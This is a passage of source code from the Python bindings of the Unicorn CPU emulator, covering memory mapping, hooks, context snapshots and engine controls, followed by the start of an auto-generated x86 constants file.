        """Start emulation from a specified address to another.

        Args:
            begin   : emulation starting address
            until   : emulation ending address
            timeout : limit emulation to a certain amount of time (milliseconds)
            count   : limit emulation to a certain amount of instructions

        Raises:
            `UcError`   : in case emulation could not be started properly
            `Exception` : in case an error has been encountered during emulation
        """
        self._hook_exception = None
        status = uclib.uc_emu_start(self._uch, begin, until, timeout, count)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        if self._hook_exception is not None:
            raise self._hook_exception

    def emu_stop(self) -> None:
        """Stop emulation.

        Raises: `UcError` in case emulation could not be stopped properly
        """
        status = uclib.uc_emu_stop(self._uch)

        if status != uc.UC_ERR_OK:
            raise UcError(status)
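    # A minimal end-to-end emulation sketch (illustrative; assumes the usual
    # top-level unicorn exports and x86 register constants; b'\x41\x4a'
    # encodes INC ecx; DEC edx in 32-bit x86):
    #
    #     mu = Uc(UC_ARCH_X86, UC_MODE_32)
    #     mu.mem_map(0x1000000, 2 * 1024 * 1024)
    #     mu.mem_write(0x1000000, b'\x41\x4a')
    #     mu.reg_write(UC_X86_REG_ECX, 0x1234)
    #     mu.emu_start(0x1000000, 0x1000000 + 2)
    #     assert mu.reg_read(UC_X86_REG_ECX) == 0x1235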
    ###########################
    #   CPU state accessors   #
    ###########################

    def _do_reg_read(self, reg_id: int, reg_obj) -> int:
        """Private register read implementation.
        Do not call directly.
        """
        return uclib.uc_reg_read(self._uch, reg_id, reg_obj)

    def _do_reg_write(self, reg_id: int, reg_obj) -> int:
        """Private register write implementation.
        Do not call directly.
        """
        return uclib.uc_reg_write(self._uch, reg_id, reg_obj)

    def _do_reg_read_batch(self, reglist, vallist, count) -> int:
        """Private batch register read implementation.
        Do not call directly.
        """
        return uclib.uc_reg_read_batch(self._uch, reglist, vallist, count)

    ###########################
    #    Memory management    #
    ###########################

    def mem_map(self, address: int, size: int, perms: int = uc.UC_PROT_ALL) -> None:
        """Map a memory range.

        Args:
            address : range base address
            size    : range size (in bytes)
            perms   : access protection bitmask

        Raises: `UcError` in case memory could not be mapped
        """
        assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask'

        status = uclib.uc_mem_map(self._uch, address, size, perms)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def mem_map_ptr(self, address: int, size: int, perms: int, ptr: int) -> None:
        """Map a memory range and point to existing data on host memory.

        Args:
            address : range base address
            size    : range size (in bytes)
            perms   : access protection bitmask
            ptr     : address of data on host memory

        Raises: `UcError` in case memory could not be mapped
        """
        assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask'

        status = uclib.uc_mem_map_ptr(self._uch, address, size, perms, ptr)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def mem_unmap(self, address: int, size: int) -> None:
        """Reclaim a mapped memory range.

        Args:
            address : range base address
            size    : range size (in bytes)

        Raises: `UcError` in case memory could not be unmapped
        """
        status = uclib.uc_mem_unmap(self._uch, address, size)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        # TODO: this is where mmio callbacks need to be released from cache,
        # but we cannot tell whether this is an mmio range. also, memory ranges
        # might be split by 'mem_protect' after they were mapped, so the
        # (start, end) tuple may not be suitable for retrieving the callbacks.
        #
        # here we try to do that on a best-effort basis:

        rng = (address, address + size)

        if rng in self._mmio_callbacks:
            del self._mmio_callbacks[rng]

    def mem_protect(self, address: int, size: int, perms: int = uc.UC_PROT_ALL) -> None:
        """Modify access protection bitmask of a mapped memory range.

        Args:
            address : range base address
            size    : range size (in bytes)
            perms   : new access protection bitmask

        Raises: `UcError` in case access protection bitmask could not be changed
        """
        assert (perms & ~uc.UC_PROT_ALL) == 0, 'unexpected perms bitmask'

        status = uclib.uc_mem_protect(self._uch, address, size, perms)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def mmio_map(self, address: int, size: int,
                 read_cb: Optional[UC_MMIO_READ_TYPE], user_data_read: Any,
                 write_cb: Optional[UC_MMIO_WRITE_TYPE], user_data_write: Any) -> None:

        @uccallback(self, MMIO_READ_CFUNC)
        def __mmio_map_read_cb(uc: Uc, offset: int, size: int, key: int) -> int:
            assert read_cb is not None

            return read_cb(uc, offset, size, user_data_read)

        @uccallback(self, MMIO_WRITE_CFUNC)
        def __mmio_map_write_cb(uc: Uc, offset: int, size: int, value: int, key: int) -> None:
            assert write_cb is not None

            write_cb(uc, offset, size, value, user_data_write)

        read_cb_fptr = read_cb and __mmio_map_read_cb
        write_cb_fptr = write_cb and __mmio_map_write_cb

        status = uclib.uc_mmio_map(self._uch, address, size, read_cb_fptr, 0, write_cb_fptr, 0)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        # hold a reference to mmio callbacks
        rng = (address, address + size)

        self._mmio_callbacks[rng] = (read_cb_fptr, write_cb_fptr)
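    # An illustrative MMIO sketch: expose a fake device register window that
    # reads back as a constant and logs writes (hedged; callback signatures
    # follow the UC_MMIO_READ_TYPE / UC_MMIO_WRITE_TYPE aliases defined at the
    # bottom of this module; offsets are relative to the mapping base):
    #
    #     def dev_read(mu, offset, size, user_data):
    #         return 0xdeadbeef
    #
    #     def dev_write(mu, offset, size, value, user_data):
    #         print(f'device write at +{offset:#x}: {value:#x}')
    #
    #     mu.mmio_map(0x2000, 0x1000, dev_read, None, dev_write, None)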
    def mem_regions(self) -> Iterator[Tuple[int, int, int]]:
        """Iterate through mapped memory regions.

        Returns: an iterator whose elements contain begin, end and perms properties of each range

        Raises: `UcError` in case an internal error has been encountered
        """
        regions = ctypes.POINTER(_uc_mem_region)()
        count = ctypes.c_uint32()

        status = uclib.uc_mem_regions(self._uch, ctypes.byref(regions), ctypes.byref(count))

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        try:
            for i in range(count.value):
                yield regions[i].value

        finally:
            uclib.uc_free(regions)

    def mem_read(self, address: int, size: int) -> bytearray:
        """Read data from emulated memory subsystem.

        Args:
            address : source memory location
            size    : amount of bytes to read

        Returns: data bytes

        Raises: `UcError` in case of an invalid memory access
        """
        data = ctypes.create_string_buffer(size)

        status = uclib.uc_mem_read(self._uch, address, data, size)

        if status != uc.UC_ERR_OK:
            raise UcError(status, address, size)

        return bytearray(data)

    def mem_write(self, address: int, data: bytes) -> None:
        """Write data to emulated memory subsystem.

        Args:
            address : target memory location
            data    : data bytes to write

        Raises: `UcError` in case of an invalid memory access
        """
        size = len(data)

        status = uclib.uc_mem_write(self._uch, address, data, size)

        if status != uc.UC_ERR_OK:
            raise UcError(status, address, size)
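    # An illustrative sketch of the memory accessors working together
    # (assumes a mapped range at 0x1000000, as in the earlier sketch):
    #
    #     mu.mem_write(0x1000000, b'\x90' * 16)       # fill with NOPs
    #     chunk = mu.mem_read(0x1000000, 16)          # -> bytearray
    #     for begin, end, perms in mu.mem_regions():
    #         print(f'{begin:#x}-{end:#x} perms={perms:#x}')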
    ###########################
    # Event hooks management  #
    ###########################

    def __do_hook_add(self, htype: int, fptr: ctypes._FuncPointer, begin: int, end: int, *args: ctypes.c_int) -> int:
        handle = uc_hook_h()

        # TODO: we do not need a callback counter to reference the callback and user data anymore,
        # so just pass a dummy value. that value will become the unused 'key' argument
        dummy = 0

        status = uclib.uc_hook_add(
            self._uch,
            ctypes.byref(handle),
            htype,
            fptr,
            ctypes.cast(dummy, ctypes.c_void_p),
            ctypes.c_uint64(begin),
            ctypes.c_uint64(end),
            *args
        )

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        # hold a reference to the function pointer to prevent it from being gc-ed
        self._callbacks[handle.value] = fptr

        return handle.value

    def hook_add(self, htype: int, callback: Callable, user_data: Any = None,
                 begin: int = 1, end: int = 0, aux1: int = 0, aux2: int = 0) -> int:
        """Hook emulated events of a certain type.

        Args:
            htype     : event type(s) to hook (see UC_HOOK_* constants)
            callback  : a method to call each time the hooked event occurs
            user_data : an additional context to pass to the callback when it is called
            begin     : address where hook scope starts
            end       : address where hook scope ends
            aux1      : auxiliary parameter; needed for some hook types
            aux2      : auxiliary parameter; needed for some hook types

        Returns: hook handle

        Raises: `UcError` in case of an invalid htype value
        """

        def __hook_intr():
            @uccallback(self, HOOK_INTR_CFUNC)
            def __hook_intr_cb(uc: Uc, intno: int, key: int):
                callback(uc, intno, user_data)

            return __hook_intr_cb,

        def __hook_insn():
            # each arch is expected to overload hook_add and implement this handler on their own.
            # if we got here, it means this particular architecture does not support hooking any
            # instruction and so we fail
            raise UcError(uc.UC_ERR_ARG)

        def __hook_code():
            @uccallback(self, HOOK_CODE_CFUNC)
            def __hook_code_cb(uc: Uc, address: int, size: int, key: int):
                callback(uc, address, size, user_data)

            return __hook_code_cb,

        def __hook_invalid_mem():
            @uccallback(self, HOOK_MEM_INVALID_CFUNC)
            def __hook_mem_invalid_cb(uc: Uc, access: int, address: int, size: int, value: int, key: int) -> bool:
                return callback(uc, access, address, size, value, user_data)

            return __hook_mem_invalid_cb,

        def __hook_mem():
            @uccallback(self, HOOK_MEM_ACCESS_CFUNC)
            def __hook_mem_access_cb(uc: Uc, access: int, address: int, size: int, value: int, key: int) -> None:
                callback(uc, access, address, size, value, user_data)

            return __hook_mem_access_cb,

        def __hook_invalid_insn():
            @uccallback(self, HOOK_INSN_INVALID_CFUNC)
            def __hook_insn_invalid_cb(uc: Uc, key: int) -> bool:
                return callback(uc, user_data)

            return __hook_insn_invalid_cb,

        def __hook_edge_gen():
            @uccallback(self, HOOK_EDGE_GEN_CFUNC)
            def __hook_edge_gen_cb(uc: Uc, cur: ctypes._Pointer[uc_tb], prev: ctypes._Pointer[uc_tb], key: int):
                callback(uc, cur.contents, prev.contents, user_data)

            return __hook_edge_gen_cb,

        def __hook_tcg_opcode():
            @uccallback(self, HOOK_TCG_OPCODE_CFUNC)
            def __hook_tcg_op_cb(uc: Uc, address: int, arg1: int, arg2: int, size: int, key: int):
                callback(uc, address, arg1, arg2, size, user_data)

            opcode = ctypes.c_uint64(aux1)
            flags = ctypes.c_uint64(aux2)

            return __hook_tcg_op_cb, opcode, flags

        handlers: Mapping[int, Callable[[], Tuple]] = {
            uc.UC_HOOK_INTR               : __hook_intr,
            uc.UC_HOOK_INSN               : __hook_insn,
            uc.UC_HOOK_CODE               : __hook_code,
            uc.UC_HOOK_BLOCK              : __hook_code,
            uc.UC_HOOK_MEM_READ_UNMAPPED  : __hook_invalid_mem,
            uc.UC_HOOK_MEM_WRITE_UNMAPPED : __hook_invalid_mem,
            uc.UC_HOOK_MEM_FETCH_UNMAPPED : __hook_invalid_mem,
            uc.UC_HOOK_MEM_READ_PROT      : __hook_invalid_mem,
            uc.UC_HOOK_MEM_WRITE_PROT     : __hook_invalid_mem,
            uc.UC_HOOK_MEM_FETCH_PROT     : __hook_invalid_mem,
            uc.UC_HOOK_MEM_READ           : __hook_mem,
            uc.UC_HOOK_MEM_WRITE          : __hook_mem,
            uc.UC_HOOK_MEM_FETCH          : __hook_mem,
            # uc.UC_HOOK_MEM_READ_AFTER
            uc.UC_HOOK_INSN_INVALID       : __hook_invalid_insn,
            uc.UC_HOOK_EDGE_GENERATED     : __hook_edge_gen,
            uc.UC_HOOK_TCG_OPCODE         : __hook_tcg_opcode
        }

        # the same callback may be registered for multiple hook types if they
        # share the same handling method. here we iterate through htype set bits
        # and collect all unique handlers it refers to (no duplicates)
        matched = set(handlers.get(1 << n) for n in range(32) if htype & (1 << n))

        # the set of matched handlers is expected to include exactly one element.
        # more than one member indicates that htype refers to more than one handler
        # at the same time, whereas callbacks cannot be assigned to different handlers.
        # an empty set indicates a matching handler was not found, probably due to
        # an invalid htype value
        if len(matched) != 1:
            raise UcError(uc.UC_ERR_ARG)

        handler = matched.pop()

        # a None element indicates that htype has an unrecognized bit set
        if handler is None:
            raise UcError(uc.UC_ERR_ARG)

        fptr, *aux = handler()

        return self.__do_hook_add(htype, fptr, begin, end, *aux)

    def hook_del(self, handle: int) -> None:
        """Remove an existing hook.

        Args:
            handle: hook handle
        """
        h = uc_hook_h(handle)

        status = uclib.uc_hook_del(self._uch, h)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        del self._callbacks[handle]
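    # An illustrative hook sketch: trace every executed instruction within a
    # range (hedged; assumes UC_HOOK_CODE from the top-level constants and an
    # engine `mu` set up as in the earlier sketches):
    #
    #     def trace(mu, address, size, user_data):
    #         print(f'executing {address:#x} ({size} bytes)')
    #
    #     h = mu.hook_add(UC_HOOK_CODE, trace, begin=0x1000000, end=0x1001000)
    #     mu.emu_start(0x1000000, 0x1000000 + 2)
    #     mu.hook_del(h)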
    def query(self, prop: int) -> int:
        """Query an internal Unicorn property.

        Args:
            prop: property identifier (see: UC_QUERY_* constants)

        Returns: property value
        """
        result = ctypes.c_size_t()

        status = uclib.uc_query(self._uch, prop, ctypes.byref(result))

        if status != uc.UC_ERR_OK:
            raise UcError(status, prop)

        return result.value

    def context_save(self) -> UcContext:
        context = UcContext(self._uch, self._arch, self._mode)

        status = uclib.uc_context_save(self._uch, context.context)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        return context

    def context_update(self, context: UcContext) -> None:
        status = uclib.uc_context_save(self._uch, context.context)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

    def context_restore(self, context: UcContext) -> None:
        status = uclib.uc_context_restore(self._uch, context.context)

        if status != uc.UC_ERR_OK:
            raise UcError(status)
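    # An illustrative CPU-context snapshot sketch: capture state, run further,
    # then roll back (UcContext instances are also picklable, see the
    # __getstate__ / __setstate__ implementation below):
    #
    #     snapshot = mu.context_save()
    #     mu.emu_start(0x1000000, 0x1000000 + 2)
    #     mu.context_restore(snapshot)       # CPU registers rolled back
    #
    #     import pickle
    #     blob = pickle.dumps(snapshot)      # survives process boundaries
    #     snapshot2 = pickle.loads(blob)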
    @staticmethod
    def __ctl_encode(ctl: int, op: int, nargs: int) -> int:
        assert nargs and (nargs & ~0b1111) == 0, f'nargs must not exceed value of 15 (got {nargs})'
        assert op and (op & ~0b11) == 0, f'op must not exceed value of 3 (got {op})'

        return (op << 30) | (nargs << 26) | ctl

    def ctl(self, ctl: int, op: int, *args):
        code = Uc.__ctl_encode(ctl, op, len(args))

        status = uclib.uc_ctl(self._uch, code, *args)

        if status != uc.UC_ERR_OK:
            raise UcError(status)

    Arg = Tuple[Type, Optional[int]]

    def __ctl_r(self, ctl: int, arg0: Arg):
        atype, _ = arg0
        carg = atype()

        self.ctl(ctl, uc.UC_CTL_IO_READ, ctypes.byref(carg))

        return carg.value

    def __ctl_w(self, ctl: int, *args: Arg):
        cargs = (atype(avalue) for atype, avalue in args)

        self.ctl(ctl, uc.UC_CTL_IO_WRITE, *cargs)

    def __ctl_wr(self, ctl: int, arg0: Arg, arg1: Arg):
        atype, avalue = arg0
        carg0 = atype(avalue)

        atype, _ = arg1
        carg1 = atype()

        self.ctl(ctl, uc.UC_CTL_IO_READ_WRITE, carg0, ctypes.byref(carg1))

        return carg1

    def ctl_get_mode(self) -> int:
        return self.__ctl_r(uc.UC_CTL_UC_MODE,
            (ctypes.c_int, None)
        )

    def ctl_get_page_size(self) -> int:
        return self.__ctl_r(uc.UC_CTL_UC_PAGE_SIZE,
            (ctypes.c_uint32, None)
        )

    def ctl_set_page_size(self, val: int) -> None:
        self.__ctl_w(uc.UC_CTL_UC_PAGE_SIZE,
            (ctypes.c_uint32, val)
        )

    def ctl_get_arch(self) -> int:
        return self.__ctl_r(uc.UC_CTL_UC_ARCH,
            (ctypes.c_int, None)
        )

    def ctl_get_timeout(self) -> int:
        return self.__ctl_r(uc.UC_CTL_UC_TIMEOUT,
            (ctypes.c_uint64, None)
        )

    def ctl_exits_enabled(self, val: bool) -> None:
        self.__ctl_w(uc.UC_CTL_UC_USE_EXITS,
            (ctypes.c_int, val)
        )

    def ctl_get_exits_cnt(self) -> int:
        return self.__ctl_r(uc.UC_CTL_UC_EXITS_CNT,
            (ctypes.c_size_t, None)
        )

    def ctl_get_exits(self) -> Sequence[int]:
        count = self.ctl_get_exits_cnt()
        arr = (ctypes.c_uint64 * count)()

        self.ctl(uc.UC_CTL_UC_EXITS, uc.UC_CTL_IO_READ, ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(count))

        return tuple(i for i in arr)

    def ctl_set_exits(self, exits: Sequence[int]) -> None:
        arr = (ctypes.c_uint64 * len(exits))()

        for idx, exit in enumerate(exits):
            arr[idx] = exit

        self.ctl(uc.UC_CTL_UC_EXITS, uc.UC_CTL_IO_WRITE, ctypes.cast(arr, ctypes.c_void_p), ctypes.c_size_t(len(exits)))

    def ctl_get_cpu_model(self) -> int:
        return self.__ctl_r(uc.UC_CTL_CPU_MODEL,
            (ctypes.c_int, None)
        )

    def ctl_set_cpu_model(self, val: int) -> None:
        self.__ctl_w(uc.UC_CTL_CPU_MODEL,
            (ctypes.c_int, val)
        )

    def ctl_remove_cache(self, addr: int, end: int) -> None:
        self.__ctl_w(uc.UC_CTL_TB_REMOVE_CACHE,
            (ctypes.c_uint64, addr),
            (ctypes.c_uint64, end)
        )

    def ctl_request_cache(self, addr: int):
        return self.__ctl_wr(uc.UC_CTL_TB_REQUEST_CACHE,
            (ctypes.c_uint64, addr),
            (uc_tb, None)
        )

    def ctl_flush_tb(self) -> None:
        self.__ctl_w(uc.UC_CTL_TB_FLUSH)

    def ctl_tlb_mode(self, mode: int) -> None:
        self.__ctl_w(uc.UC_CTL_TLB_TYPE,
            (ctypes.c_uint, mode)
        )


class UcContext(RegStateManager):
    def __init__(self, h, arch: int, mode: int):
        self._context = uc_context()
        self._size = uclib.uc_context_size(h)
        status = uclib.uc_context_alloc(h, ctypes.byref(self._context))

        if status != uc.UC_ERR_OK:
            raise UcError(status)

        self._to_free = True
        self._arch = arch
        self._mode = mode

    @property
    def context(self):
        return self._context

    @property
    def size(self) -> int:
        return self._size

    @property
    def arch(self) -> int:
        return self._arch

    @property
    def mode(self) -> int:
        return self._mode

    # RegStateManager mixin method implementation
    def _do_reg_read(self, reg_id: int, reg_obj) -> int:
        """Private register read implementation.
        """
        return uclib.uc_context_reg_read(self._context, reg_id, reg_obj)

    # RegStateManager mixin method implementation
    def _do_reg_write(self, reg_id: int, reg_obj) -> int:
        """Private register write implementation.
        """
        return uclib.uc_context_reg_write(self._context, reg_id, reg_obj)

    def _do_reg_read_batch(self, reglist, vallist, count) -> int:
        """Private batch register read implementation.
        """
        return uclib.uc_context_reg_read_batch(self._context, reglist, vallist, count)

    # Make UcContext picklable
    def __getstate__(self):
        return bytes(self), self.size, self.arch, self.mode

    def __setstate__(self, state) -> None:
        context, size, arch, mode = state

        self._context = ctypes.cast(ctypes.create_string_buffer(context, size), uc_context)
        self._size = size
        self._arch = arch
        self._mode = mode

        # __init__ won't be invoked, so we are safe to set it here.
        self._to_free = False

    def __bytes__(self) -> bytes:
        return ctypes.string_at(self.context, self.size)

    def __del__(self) -> None:
        # We need this property since we shouldn't free it if the object is constructed from pickled bytes.
        if self._to_free:
            uclib.uc_context_free(self._context)


UC_MMIO_READ_TYPE = Callable[[Uc, int, int, Any], int]
UC_MMIO_WRITE_TYPE = Callable[[Uc, int, int, int, Any], None]

__all__ = ['Uc', 'UcContext', 'ucsubclass', 'UcError', 'uc_version', 'version_bind', 'uc_arch_supported', 'debug']
unicorn-2.1.1/bindings/python/unicorn/x86_const.py
# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py] # X86 CPU UC_CPU_X86_QEMU64 = 0 UC_CPU_X86_PHENOM = 1 UC_CPU_X86_CORE2DUO = 2 UC_CPU_X86_KVM64 = 3 UC_CPU_X86_QEMU32 = 4 UC_CPU_X86_KVM32 = 5 UC_CPU_X86_COREDUO = 6 UC_CPU_X86_486 = 7 UC_CPU_X86_PENTIUM = 8 UC_CPU_X86_PENTIUM2 = 9 UC_CPU_X86_PENTIUM3 = 10 UC_CPU_X86_ATHLON = 11 UC_CPU_X86_N270 = 12 UC_CPU_X86_CONROE = 13 UC_CPU_X86_PENRYN = 14 UC_CPU_X86_NEHALEM = 15 UC_CPU_X86_WESTMERE = 16 UC_CPU_X86_SANDYBRIDGE = 17 UC_CPU_X86_IVYBRIDGE = 18 UC_CPU_X86_HASWELL = 19 UC_CPU_X86_BROADWELL = 20 UC_CPU_X86_SKYLAKE_CLIENT = 21 UC_CPU_X86_SKYLAKE_SERVER = 22 UC_CPU_X86_CASCADELAKE_SERVER = 23 UC_CPU_X86_COOPERLAKE = 24 UC_CPU_X86_ICELAKE_CLIENT = 25 UC_CPU_X86_ICELAKE_SERVER = 26 UC_CPU_X86_DENVERTON = 27 UC_CPU_X86_SNOWRIDGE = 28 UC_CPU_X86_KNIGHTSMILL = 29 UC_CPU_X86_OPTERON_G1 = 30 UC_CPU_X86_OPTERON_G2 = 31 UC_CPU_X86_OPTERON_G3 = 32 UC_CPU_X86_OPTERON_G4 = 33 UC_CPU_X86_OPTERON_G5 = 34 UC_CPU_X86_EPYC = 35 UC_CPU_X86_DHYANA = 36 UC_CPU_X86_EPYC_ROME = 37 UC_CPU_X86_ENDING = 38 # X86 registers UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_BL = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR8 = 58 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 UC_X86_REG_XMM20 = 
142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_MSR = 248 UC_X86_REG_MXCSR = 249 UC_X86_REG_FS_BASE = 250 UC_X86_REG_GS_BASE = 251 UC_X86_REG_FLAGS = 252 UC_X86_REG_RFLAGS = 253 UC_X86_REG_FIP = 254 UC_X86_REG_FCS = 255 UC_X86_REG_FDP = 256 UC_X86_REG_FDS = 257 UC_X86_REG_FOP = 258 UC_X86_REG_ENDING = 259 # X86 instructions UC_X86_INS_INVALID = 0 UC_X86_INS_AAA = 1 UC_X86_INS_AAD = 2 UC_X86_INS_AAM = 3 UC_X86_INS_AAS = 4 UC_X86_INS_FABS = 5 UC_X86_INS_ADC = 6 UC_X86_INS_ADCX = 7 UC_X86_INS_ADD = 8 UC_X86_INS_ADDPD = 9 UC_X86_INS_ADDPS = 10 UC_X86_INS_ADDSD = 11 UC_X86_INS_ADDSS = 12 UC_X86_INS_ADDSUBPD = 13 UC_X86_INS_ADDSUBPS = 14 UC_X86_INS_FADD = 15 UC_X86_INS_FIADD = 16 UC_X86_INS_FADDP = 17 UC_X86_INS_ADOX = 18 